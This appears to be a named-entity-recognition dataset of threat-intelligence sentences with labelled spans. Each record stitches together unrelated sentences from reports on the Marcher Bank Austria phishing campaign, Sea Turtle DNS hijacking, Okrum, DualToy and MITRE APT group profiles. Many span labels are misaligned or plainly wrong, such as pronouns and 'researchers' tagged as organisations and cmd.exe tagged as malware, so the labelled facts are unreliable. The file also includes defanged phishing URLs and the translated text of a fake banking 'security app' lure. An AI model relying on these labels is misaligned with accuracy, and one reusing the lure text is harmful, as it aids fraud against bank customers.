Ke3chang has targeted several industries , including oil , government , military , and more .", "spans": [{"start": 104, "end": 111, "label": "Malware"}, {"start": 155, "end": 171, "label": "Malware"}, {"start": 215, "end": 231, "label": "Malware"}, {"start": 253, "end": 262, "label": "Organization"}, {"start": 330, "end": 338, "label": "Organization"}]} {"text": "We would also like to mention that if you come across an app hiding it 's icon , always try to search for the app in your device settings ( by going to Settings - > Apps - > Search for icon that was hidden ) . The story continued in late 2016 , when we discovered a new , previously unknown backdoor that we named Okrum . Kimsuky : Velvet Chollima .", "spans": [{"start": 291, "end": 299, "label": "System"}, {"start": 314, "end": 319, "label": "System"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 332, "end": 347, "label": "Organization"}]} {"text": "In the case of this spyware , search for app named TikTok Pro . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . 
Kimsuky is a North Korean based threat group that has been active since at least September 2013 .", "spans": [{"start": 51, "end": 61, "label": "System"}, {"start": 96, "end": 109, "label": "Malware"}, {"start": 202, "end": 211, "label": "Malware"}, {"start": 214, "end": 221, "label": "Organization"}]} {"text": "MITRE TAGS Action Tag ID App auto-start at device boot T1402 Input prompt T1411 Capture SMS messages T1412 Application discovery T1418 Capture audio T1429 Location tracking T1430 Access contact list T1432 Access call log T1433 Commonly used port T1436 Standard application layer protocol T1437 Masquerage as legitimate application T1444 Suppress application icon T1508 Capture camera T1512 Screen capture T1513 Foreground persistence T1541 DualToy : New Windows Trojan Sideloads Risky Apps to Android and iOS Devices We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . The group focuses on targeting Korean think tank as well as DPRK/nuclear-related targets .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 440, "end": 447, "label": "Malware"}, {"start": 454, "end": 461, "label": "System"}, {"start": 493, "end": 500, "label": "System"}, {"start": 505, "end": 508, "label": "System"}, {"start": 576, "end": 590, "label": "Malware"}, {"start": 610, "end": 627, "label": "Malware"}, {"start": 688, "end": 705, "label": "Organization"}, {"start": 717, "end": 737, "label": "Organization"}]} {"text": "By Claud Xiao September 13 , 2016 at 5:00 AM Over the past two years , we \u2019 ve observed many cases of Microsoft Windows and Apple iOS malware designed to attack mobile devices . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . 
The group was attributed as the actor behind the Korea Hydro & Nuclear Power Co.compromise .", "spans": [{"start": 102, "end": 119, "label": "System"}, {"start": 124, "end": 133, "label": "System"}, {"start": 232, "end": 245, "label": "Malware"}, {"start": 262, "end": 280, "label": "Malware"}, {"start": 377, "end": 418, "label": "Organization"}]} {"text": "This attack vector is increasingly popular with malicious actors as almost everyone on the planet carries at least one mobile device they interact with throughout any given day . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . Lazarus Group : HIDDEN COBRA , Guardians of Peace , ZINC , NICKEL ACADEMY .", "spans": [{"start": 230, "end": 246, "label": "Malware"}, {"start": 253, "end": 261, "label": "Malware"}, {"start": 278, "end": 291, "label": "Organization"}, {"start": 294, "end": 306, "label": "Organization"}, {"start": 309, "end": 327, "label": "Organization"}, {"start": 330, "end": 334, "label": "Organization"}, {"start": 337, "end": 351, "label": "Organization"}]} {"text": "Thanks to a relative lack of security controls applied to mobile devices , these devices have become very attractive targets for a broad range of malicious actors . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . 
Lazarus Group is a threat group that has been attributed to the North Korean government .", "spans": [{"start": 178, "end": 182, "label": "Organization"}, {"start": 195, "end": 200, "label": "Malware"}, {"start": 343, "end": 356, "label": "Organization"}, {"start": 407, "end": 430, "label": "Organization"}]} {"text": "For example : WireLurker installed malicious apps on non-jailbroken iPhones Six different Trojan , Adware and HackTool families launched \u201c BackStab \u201d attacks to steal backup archives of iOS and BlackBerry devices The HackingTeam \u2019 s RCS delivered its Spyware from infected PCs and Macs to jailbroken iOS devices and BlackBerry phones Recently , we discovered another Windows Trojan we named \u201c DualToy \u201d which side loads malicious or risky apps to both Android and iOS devices via a USB connection . In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . 
The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta .", "spans": [{"start": 14, "end": 24, "label": "Malware"}, {"start": 110, "end": 127, "label": "Malware"}, {"start": 186, "end": 189, "label": "System"}, {"start": 194, "end": 204, "label": "System"}, {"start": 217, "end": 228, "label": "Malware"}, {"start": 233, "end": 236, "label": "Malware"}, {"start": 300, "end": 303, "label": "System"}, {"start": 316, "end": 326, "label": "System"}, {"start": 367, "end": 374, "label": "System"}, {"start": 393, "end": 400, "label": "Malware"}, {"start": 452, "end": 459, "label": "System"}, {"start": 464, "end": 467, "label": "System"}, {"start": 482, "end": 485, "label": "System"}, {"start": 555, "end": 564, "label": "Organization"}, {"start": 589, "end": 596, "label": "Organization"}, {"start": 806, "end": 833, "label": "Organization"}, {"start": 887, "end": 894, "label": "Organization"}]} {"text": "When DualToy began to spread in January 2015 , it was only capable of infecting Android devices . In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements . Malware used by Lazarus Group correlates to other reported campaigns , including Operation Flame , Operation 1Mission , Operation Troy , DarkSeoul , and Ten Days of Rain .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 80, "end": 87, "label": "System"}, {"start": 108, "end": 110, "label": "Organization"}, {"start": 216, "end": 229, "label": "Organization"}, {"start": 281, "end": 296, "label": "Malware"}, {"start": 299, "end": 317, "label": "Malware"}, {"start": 320, "end": 334, "label": "Malware"}, {"start": 337, "end": 346, "label": "Malware"}, {"start": 353, "end": 369, "label": "Malware"}]} {"text": "However , within six months the malicious actors added the capability to infect iOS devices . 
According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . In late 2017 , Lazarus Group used KillDisk , a disk-wiping tool , in an attack against an online casino based in Central America .", "spans": [{"start": 80, "end": 83, "label": "System"}, {"start": 123, "end": 128, "label": "Malware"}, {"start": 303, "end": 316, "label": "Organization"}, {"start": 322, "end": 330, "label": "Malware"}]} {"text": "DualToy is still active and we have detected over 8,000 unique samples belonging to this Trojan family to date . Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions . North Korean group definitions are known to have significant overlap , and the name Lazarus Group is known to encompass a broad range of activity .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 196, "end": 205, "label": "System"}, {"start": 208, "end": 213, "label": "System"}, {"start": 241, "end": 269, "label": "System"}, {"start": 356, "end": 369, "label": "Organization"}]} {"text": "It mainly targets Chinese users , but has also successfully affected people and organizations in the United States , United Kingdom , Thailand , Spain , and Ireland . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . 
Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea .", "spans": [{"start": 219, "end": 224, "label": "Malware"}, {"start": 241, "end": 250, "label": "Malware"}, {"start": 451, "end": 464, "label": "Organization"}]} {"text": "Credential phishing and an Android banking Trojan combine in Austrian mobile attacks NOVEMBER 03 , 2017 Overview Credential phishing , banking Trojans , and credit card phishing schemes are common threats that we regularly observe both at scale and in more targeted attacks . The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation . Some organizations track North Korean clusters or groups such as Bluenoroff , APT37 , and APT38 separately , while other organizations may track some activity associated with those group names by the name Lazarus Group .", "spans": [{"start": 27, "end": 34, "label": "System"}, {"start": 461, "end": 469, "label": "Organization"}, {"start": 589, "end": 599, "label": "Organization"}, {"start": 602, "end": 607, "label": "Organization"}, {"start": 614, "end": 619, "label": "Organization"}, {"start": 729, "end": 742, "label": "Organization"}]} {"text": "However , Proofpoint researchers have recently observed phishing attacks that incorporate all of these elements in a single , multistep scheme involving the Marcher Android banking Trojan targeting customers of large Austrian banks . North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies\u2019 trade secrets . 
Leafminer : Raspite .", "spans": [{"start": 10, "end": 20, "label": "Organization"}, {"start": 157, "end": 164, "label": "Malware"}, {"start": 370, "end": 398, "label": "Organization"}, {"start": 436, "end": 460, "label": "Organization"}, {"start": 477, "end": 486, "label": "Organization"}, {"start": 489, "end": 496, "label": "Organization"}]} {"text": "Attacks involving Marcher have become increasingly sophisticated , with documented cases involving multiple attack vectors and a variety of targeted financial services and communication platforms [ 1 ] [ 2 ] . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . Leafminer is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017 .", "spans": [{"start": 18, "end": 25, "label": "Malware"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 314, "end": 320, "label": "Malware"}, {"start": 415, "end": 424, "label": "Organization"}, {"start": 524, "end": 535, "label": "Organization"}]} {"text": "In this case , a threat actor has been targeting customers of Bank Austria , Raiffeisen Meine Bank , and Sparkasse since at least January 2017 . This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor . 
Elderwood : Elderwood Gang , Beijing Group , Sneaky Panda .", "spans": [{"start": 154, "end": 167, "label": "Organization"}, {"start": 373, "end": 382, "label": "Organization"}, {"start": 385, "end": 399, "label": "Organization"}, {"start": 402, "end": 415, "label": "Organization"}, {"start": 418, "end": 430, "label": "Organization"}]} {"text": "The attacks described here begin with a banking credential phishing scheme , followed by an attempt to trick the victim into installing Marcher , and finally with attempts to steal credit card information by the banking Trojan itself . Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region . Elderwood is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora .", "spans": [{"start": 136, "end": 143, "label": "Malware"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 467, "end": 476, "label": "Organization"}, {"start": 567, "end": 573, "label": "Organization"}]} {"text": "Analysis Marcher is frequently distributed via SMS , but in this case , victims are presented with a link in an email . Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group . 
The group has targeted defense organizations , supply chain manufacturers , human rights and nongovernmental organizations ( NGOs ) , and IT service providers .", "spans": [{"start": 9, "end": 16, "label": "Malware"}, {"start": 120, "end": 131, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 194, "end": 211, "label": "System"}, {"start": 221, "end": 231, "label": "Organization"}, {"start": 295, "end": 316, "label": "Organization"}]} {"text": "Oftentimes , the emailed link is a bit.ly shortened link , used to potentially evade detection . The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script . Equation is a sophisticated threat group that employs multiple remote access tools .", "spans": [{"start": 101, "end": 110, "label": "Organization"}, {"start": 346, "end": 354, "label": "Organization"}, {"start": 409, "end": 428, "label": "Malware"}]} {"text": "The link leads to a phishing page that asks for banking login credentials or an account number and PIN . Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file . The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives .", "spans": [{"start": 105, "end": 112, "label": "Organization"}, {"start": 139, "end": 153, "label": "System"}, {"start": 258, "end": 275, "label": "Vulnerability"}]} {"text": "Figure 1 shows one such landing page using stolen branding from Bank Austria . Once the script runs , it passes the decoded script from the image file to the Windows command line in a variable $x , which uses cmd.exe to execute the obfuscated script and run it via PowerShell . 
FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016 .", "spans": [{"start": 102, "end": 104, "label": "Organization"}, {"start": 209, "end": 216, "label": "Malware"}, {"start": 265, "end": 275, "label": "System"}, {"start": 278, "end": 283, "label": "Organization"}]} {"text": "Figure 1 : Landing page for phishing scheme asking for the victim \u2019 s signatory number and PIN using stolen branding from Bank Austria Because the actor delivered phishing links using the bit.ly URL shortener , we can access delivery statistics for this particular campaign . The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names . The group uses stolen data exfiltrated from victims to extort organizations .", "spans": [{"start": 122, "end": 134, "label": "System"}, {"start": 188, "end": 194, "label": "Indicator"}, {"start": 312, "end": 317, "label": "Organization"}]} {"text": "The link resolves to a URL designed to appear legitimate , with a canonical domain of sicher97140 [ . In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims . Orangeworm is a group that has targeted organizations in the healthcare sector in the United States , Europe , and Asia since at least 2015 , likely for the purpose of corporate espionage .", "spans": [{"start": 86, "end": 101, "label": "Indicator"}, {"start": 131, "end": 136, "label": "Organization"}, {"start": 191, "end": 201, "label": "Organization"}]} {"text": "] info including the \u201c bankaustria \u201d brand . The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations . 
Patchwork : Dropping Elephant , Chinastrats , MONSOON , Operation Hangover .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 105, "end": 136, "label": "Organization"}, {"start": 139, "end": 149, "label": "Organization"}, {"start": 175, "end": 205, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 220, "end": 237, "label": "Organization"}, {"start": 240, "end": 251, "label": "Organization"}, {"start": 254, "end": 261, "label": "Organization"}, {"start": 264, "end": 282, "label": "Organization"}]} {"text": "Figure 2 : Bit.ly statistics for a phishing landing page targeting Bank Austria customers The actor appears to have recently begun using \u201c .top \u201d top-level domains ( TLDs ) for their phishing landing pages and have implemented a consistent naming structure as shown below . The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors . Patchwork is a cyberespionage group that was first observed in December 2015 .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 67, "end": 79, "label": "System"}, {"start": 278, "end": 291, "label": "Organization"}, {"start": 396, "end": 405, "label": "Organization"}]} {"text": "Earlier this year , the actor used \u201c .pw \u201d TLDs while the Bank Austria scheme highlighted above used \u201c .info \u201d . In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed . While the group has not been definitively attributed , circumstantial evidence suggests the group may be a pro-Indian or Indian entity .", "spans": [{"start": 58, "end": 70, "label": "System"}, {"start": 129, "end": 142, "label": "Organization"}]} {"text": "Some recent campaigns against other bank customers also used \u201c .gdn \u201d TLDs . 
The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . Patchwork has been seen targeting industries related to diplomatic and government agencies .", "spans": [{"start": 81, "end": 94, "label": "Organization"}, {"start": 187, "end": 201, "label": "Malware"}, {"start": 255, "end": 264, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}, {"start": 326, "end": 345, "label": "Organization"}]} {"text": "Other attacks on Bank Austria customers that we observed resolved to the following .top domains : Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817062 [ . If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . Much of the code used by this group was copied and pasted from online forums .", "spans": [{"start": 17, "end": 29, "label": "System"}, {"start": 112, "end": 156, "label": "Indicator"}, {"start": 163, "end": 171, "label": "Organization"}]} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817461 [ . If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018 .", "spans": [{"start": 21, "end": 65, "label": "Indicator"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 221, "end": 230, "label": "Organization"}]} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817465 [ . Captured legitimate user credentials when users interacted with these actor - controlled servers . 
PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control .", "spans": [{"start": 21, "end": 65, "label": "Indicator"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 165, "end": 175, "label": "Organization"}]} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817466 [ . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Unknown .", "spans": [{"start": 21, "end": 65, "label": "Indicator"}, {"start": 133, "end": 143, "label": "Malware"}, {"start": 158, "end": 171, "label": "Malware"}]} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817469 [ . As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure . Release_Time : unknow Report_URL : https://attack.mitre.org/groups/ APT19 \uff1a Codoso , C0d0so0 , Codoso Team , Sunshop Group .", "spans": [{"start": 21, "end": 65, "label": "Indicator"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 274, "end": 280, "label": "Organization"}, {"start": 283, "end": 290, "label": "Organization"}, {"start": 293, "end": 304, "label": "Organization"}, {"start": 307, "end": 320, "label": "Organization"}]} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58712 [ . On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar . 
APT19 is a Chinese-based threat group that has targeted a variety of industries , including defense , finance , energy , pharmaceutical , telecommunications , high tech , education , manufacturing , and legal services .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 300, "end": 307, "label": "Organization"}, {"start": 446, "end": 451, "label": "Organization"}]} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58717 [ . During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . In 2017 , a phishing campaign was used to target seven law and investment firms .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 96, "end": 101, "label": "Organization"}]} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58729 [ . The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . Some analysts track APT19 S-APT and Deep Panda as the same group , but it is unclear from open source information if the groups are the same .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Organization"}, {"start": 105, "end": 117, "label": "System"}, {"start": 200, "end": 232, "label": "Organization"}]} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58729 [ . In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . 
APT28 : SNAKEMACKEREL , Swallowtail , Group 74 , Sednit , Sofacy , Pawn Storm , Fancy Bear , STRONTIUM , Tsar Team , Threat Group-4127 , TG-4127 .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 83, "end": 94, "label": "System"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 160, "end": 178, "label": "System"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 240, "end": 253, "label": "Organization"}, {"start": 256, "end": 267, "label": "Organization"}, {"start": 270, "end": 278, "label": "Organization"}, {"start": 281, "end": 287, "label": "Organization"}, {"start": 290, "end": 296, "label": "Organization"}, {"start": 299, "end": 309, "label": "Organization"}, {"start": 312, "end": 322, "label": "Organization"}, {"start": 325, "end": 334, "label": "Organization"}, {"start": 337, "end": 346, "label": "Organization"}, {"start": 349, "end": 366, "label": "Organization"}, {"start": 369, "end": 376, "label": "Organization"}]} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87721 [ . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . APT28 is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 68, "end": 77, "label": "Organization"}, {"start": 159, "end": 163, "label": "System"}, {"start": 211, "end": 216, "label": "Organization"}, {"start": 263, "end": 330, "label": "Organization"}, {"start": 346, "end": 372, "label": "Organization"}]} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87726 [ . In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate . 
This group reportedly compromised the Hillary Clinton campaign , the Democratic National Committee , and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election .", "spans": [{"start": 21, "end": 63, "label": "Indicator"}, {"start": 117, "end": 133, "label": "Organization"}, {"start": 134, "end": 141, "label": "System"}, {"start": 247, "end": 276, "label": "Organization"}, {"start": 287, "end": 330, "label": "Organization"}]} {"text": "] top/ These permutations of TLDs and canonical domains incorporating the legitimate domain expected by the targeted banking customers exemplifies recent trends in social engineering by threat actors . One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks . APT28 has been active since at least 2004 .", "spans": [{"start": 245, "end": 252, "label": "Organization"}, {"start": 276, "end": 292, "label": "System"}, {"start": 309, "end": 336, "label": "System"}, {"start": 380, "end": 385, "label": "Organization"}]} {"text": "Just as threat actors may use stolen branding in their email lures to trick potential victims , they reproduce a legitimate domain name in a fraudulent domain that is not controlled by the bank . At this time , we do not believe that the attackers found a new ASA exploit . 
APT29 : YTTRIUM , The Dukes , Cozy Bear , CozyDuke .", "spans": [{"start": 211, "end": 213, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 260, "end": 263, "label": "Vulnerability"}, {"start": 264, "end": 271, "label": "Vulnerability"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 282, "end": 289, "label": "Organization"}, {"start": 292, "end": 301, "label": "Organization"}, {"start": 304, "end": 313, "label": "Organization"}, {"start": 316, "end": 324, "label": "Organization"}]} {"text": "Once the victim enters their account information on the landing page , the phishing attack then requests that the user log in with their email address and phone number . Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network . APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008 .", "spans": [{"start": 179, "end": 183, "label": "Organization"}, {"start": 241, "end": 246, "label": "System"}, {"start": 338, "end": 343, "label": "Organization"}, {"start": 392, "end": 410, "label": "Organization"}]} {"text": "Figure 3 : Step two of the credential phish asking for the victim \u2019 s email address and phone number Having stolen the victim \u2019 s account and personal information , the scammer introduces a social engineering scheme , informing users that they currently do not have the \u201c Bank Austria Security App \u201d installed on their smartphone and must download it to proceed . As an example , DNS records indicate that a targeted domain resolved to an actor-controlled MitM server . 
This group reportedly compromised the Democratic National Committee starting in the summer of 2015 .", "spans": [{"start": 272, "end": 297, "label": "System"}, {"start": 439, "end": 455, "label": "Organization"}, {"start": 456, "end": 467, "label": "System"}, {"start": 508, "end": 537, "label": "Organization"}]} {"text": "Figure 4 shows the download prompt for this fake app ; an English translation follows . In another case , the attackers were able to compromise NetNod , a non-profit , independent internet infrastructure organization based in Sweden . PLATINUM is an activity group that has targeted victims since at least 2009 .", "spans": [{"start": 110, "end": 119, "label": "Organization"}, {"start": 235, "end": 243, "label": "Organization"}]} {"text": "Figure 4 : Alert prompting the victim to download an Android banking app ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Dear Customer , The system has detected that the Bank Austria Security App is not installed on your smartphone . Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net . The group has focused on targets associated with governments and related organizations in South and Southeast Asia .", "spans": [{"start": 53, "end": 72, "label": "System"}, {"start": 219, "end": 244, "label": "System"}, {"start": 314, "end": 320, "label": "Organization"}, {"start": 436, "end": 447, "label": "Organization"}, {"start": 460, "end": 473, "label": "Organization"}]} {"text": "Due to new EU money laundering guidelines , the new Bank Austria security app is mandatory for all customers who have a mobile phone number in our system . This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . 
Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005 .", "spans": [{"start": 11, "end": 13, "label": "Organization"}, {"start": 52, "end": 77, "label": "System"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 292, "end": 306, "label": "Organization"}]} {"text": "Please install the app immediately to avoid blocking your account . In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax . The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm .", "spans": [{"start": 129, "end": 142, "label": "Organization"}, {"start": 185, "end": 190, "label": "Organization"}, {"start": 314, "end": 328, "label": "Organization"}]} {"text": "Follow the instructions at the bottom of this page . We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor . PROMETHIUM is an activity group that has been active since at least 2012 .", "spans": [{"start": 157, "end": 163, "label": "Organization"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}]} {"text": "Why you need the Bank Austria Security App : Due to outdated technology of the mobile network important data such as mTan SMS and online banking connections are transmitted unencrypted . Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . 
The group conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": [{"start": 17, "end": 42, "label": "System"}, {"start": 248, "end": 257, "label": "Organization"}]} {"text": "Our security app allows us to transmit this sensitive data encrypted to you , thus increasing the security that you will not suffer any financial loss . These actors perform DNS hijacking through the use of actor-controlled name servers . PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics .", "spans": [{"start": 159, "end": 165, "label": "Organization"}, {"start": 224, "end": 236, "label": "System"}, {"start": 239, "end": 249, "label": "Organization"}, {"start": 311, "end": 320, "label": "Organization"}]} {"text": "Step 1 : Download Bank Austria Security App Download the Bank Austria security app to your Android device . Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . APT33 Elfin APT33 is a suspected Iranian threat group that has carried out operations since at least 2013 .", "spans": [{"start": 18, "end": 43, "label": "System"}, {"start": 108, "end": 118, "label": "Organization"}, {"start": 172, "end": 186, "label": "Organization"}, {"start": 193, "end": 213, "label": "Organization"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 259, "end": 264, "label": "Organization"}, {"start": 265, "end": 270, "label": "Organization"}]} {"text": "To do this , open the displayed link on your mobile phone by typing in the URL field of your browser or scan the displayed QR code . These actors use Let's Encrypts , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials . 
The group has targeted organizations across multiple industries in the United States , Saudi Arabia , and South Korea , with a particular interest in the aviation and energy sectors .", "spans": [{"start": 139, "end": 145, "label": "Organization"}, {"start": 156, "end": 164, "label": "System"}, {"start": 167, "end": 173, "label": "System"}, {"start": 176, "end": 183, "label": "System"}, {"start": 190, "end": 214, "label": "System"}, {"start": 224, "end": 236, "label": "System"}]} {"text": "* * * End translation * * * The phishing template then presents additional instructions for installing the fake security application ( Figure 5 ) : Figure 5 : Additional instructions telling the victim to give the app the requested permissions ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Step 2 : Allow installation Open your device 's settings , select Security or Applications ( depending on the device ) , and check Unknown sources . These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . APT37 ScarCruft , Reaper , Group123 , TEMP.Reaper APT37 is a suspected North Korean cyber espionage group that has been active since at least 2012 .", "spans": [{"start": 496, "end": 502, "label": "Organization"}, {"start": 621, "end": 627, "label": "Organization"}, {"start": 628, "end": 634, "label": "Organization"}, {"start": 637, "end": 642, "label": "Organization"}, {"start": 643, "end": 652, "label": "Organization"}, {"start": 655, "end": 661, "label": "Organization"}, {"start": 664, "end": 672, "label": "Organization"}, {"start": 675, "end": 686, "label": "Organization"}, {"start": 687, "end": 692, "label": "Organization"}]} {"text": "Step 3 : Run installation Start the Bank Austria security app from the notifications or your download folder , tap Install . 
Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . The group has targeted victims primarily in South Korea , but also in Japan , Vietnam , Russia , Nepal , China , India , Romania , Kuwait , and other parts of the Middle East .", "spans": [{"start": 36, "end": 61, "label": "System"}, {"start": 164, "end": 168, "label": "Organization"}, {"start": 235, "end": 251, "label": "System"}, {"start": 252, "end": 259, "label": "System"}]} {"text": "After successful installation , tap Open and enable the device administrator . We believe that the Sea Turtle campaign continues to be highly successful for several reasons . APT37 has also been linked to following campaigns between 2016-2018 : Operation Daybreak , Operation Erebus , Golden Time , Evil New Year , Are you Happy? , FreeMilk , Northern Korean Human Rights , and Evil New Year 2018 .", "spans": [{"start": 79, "end": 81, "label": "Organization"}, {"start": 175, "end": 180, "label": "Organization"}]} {"text": "Finished ! Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains . APT38 APT38 is a financially-motivated threat group that is backed by the North Korean regime .", "spans": [{"start": 83, "end": 92, "label": "Organization"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 150, "end": 155, "label": "Organization"}]} {"text": "* * * End translation * * * Referring again to bit.ly , we can see click statistics for this campaign ( Figure 6 ) . The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014 . 
